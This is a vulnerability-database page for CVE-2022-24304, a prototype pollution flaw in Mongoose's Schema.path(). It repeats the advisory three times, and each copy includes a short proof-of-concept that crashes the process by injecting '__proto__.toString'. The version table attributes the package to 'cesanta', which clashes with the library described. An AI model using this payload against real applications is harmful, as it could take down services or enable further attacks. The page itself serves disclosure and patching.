CVE-2022-24304
published 2022-08-27CVE-2022-24304: Mongoose Vulnerable to Prototype Pollution in Schema Object ### Description Mongoose is a MongoDB object modeling tool designed to work in an asynchronous…
critical
Mongoose Vulnerable to Prototype Pollution in Schema Object
### Description
Mongoose is a MongoDB object modeling tool designed to work in an asynchronous environment.
Affected versions of this package are vulnerable to Prototype Pollution. The `Schema.path()` function is vulnerable to prototype pollution when setting the `schema` object. This vulnerability allows modification of the Object prototype and could be manipulated into a Denial of Service (DoS) attack.
### Proof of Concept
```js
// poc.js
const mongoose = require('mongoose');
const schema = new mongoose.Schema();
malicious_payload = '__proto__.toString'
schema.path(malicious_payload, [String])
x = {}
console.log(x.toString()) // crashed (Denial of service (DoS) attack)
```
### Impact
This vulnerability can be manipulated to exploit other types of attacks, such as Denial of service (DoS), Remote Code Execution, or Property Injection.Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cesanta | mongoose | >= 0 < 5.13.15 | 5.13.15 |
| cesanta | mongoose | >= 6.0.0 < 6.4.6 | 6.4.6 |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Mongoose Vulnerable to Prototype Pollution in Schema Object
osv·2022-08-27
CVE-2022-24304 [CRITICAL] Mongoose Vulnerable to Prototype Pollution in Schema Object
Mongoose Vulnerable to Prototype Pollution in Schema Object
### Description
Mongoose is a MongoDB object modeling tool designed to work in an asynchronous environment.
Affected versions of this package are vulnerable to Prototype Pollution. The `Schema.path()` function is vulnerable to prototype pollution when setting the `schema` object. This vulnerability allows modification of the Object prototype and could be manipulated into a Denial of Service (DoS) attack.
### Proof of Concept
```js
// poc.js
const mongoose = require('mongoose');
const schema = new mongoose.Schema();
malicious_payload = '__proto__.toString'
schema.path(malicious_payload, [String])
x = {}
console.log(x.toString()) // crashed (Denial of service (DoS) attack)
```
### Impact
This vulnerability can be manipulated
GHSA
Mongoose Vulnerable to Prototype Pollution in Schema Object
ghsa·2022-08-27
CVE-2022-24304 [CRITICAL] CWE-1321 Mongoose Vulnerable to Prototype Pollution in Schema Object
Mongoose Vulnerable to Prototype Pollution in Schema Object
### Description
Mongoose is a MongoDB object modeling tool designed to work in an asynchronous environment.
Affected versions of this package are vulnerable to Prototype Pollution. The `Schema.path()` function is vulnerable to prototype pollution when setting the `schema` object. This vulnerability allows modification of the Object prototype and could be manipulated into a Denial of Service (DoS) attack.
### Proof of Concept
```js
// poc.js
const mongoose = require('mongoose');
const schema = new mongoose.Schema();
malicious_payload = '__proto__.toString'
schema.path(malicious_payload, [String])
x = {}
console.log(x.toString()) // crashed (Denial of service (DoS) attack)
```
### Impact
This vulnerability can be manipulated
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2022-08-27
Published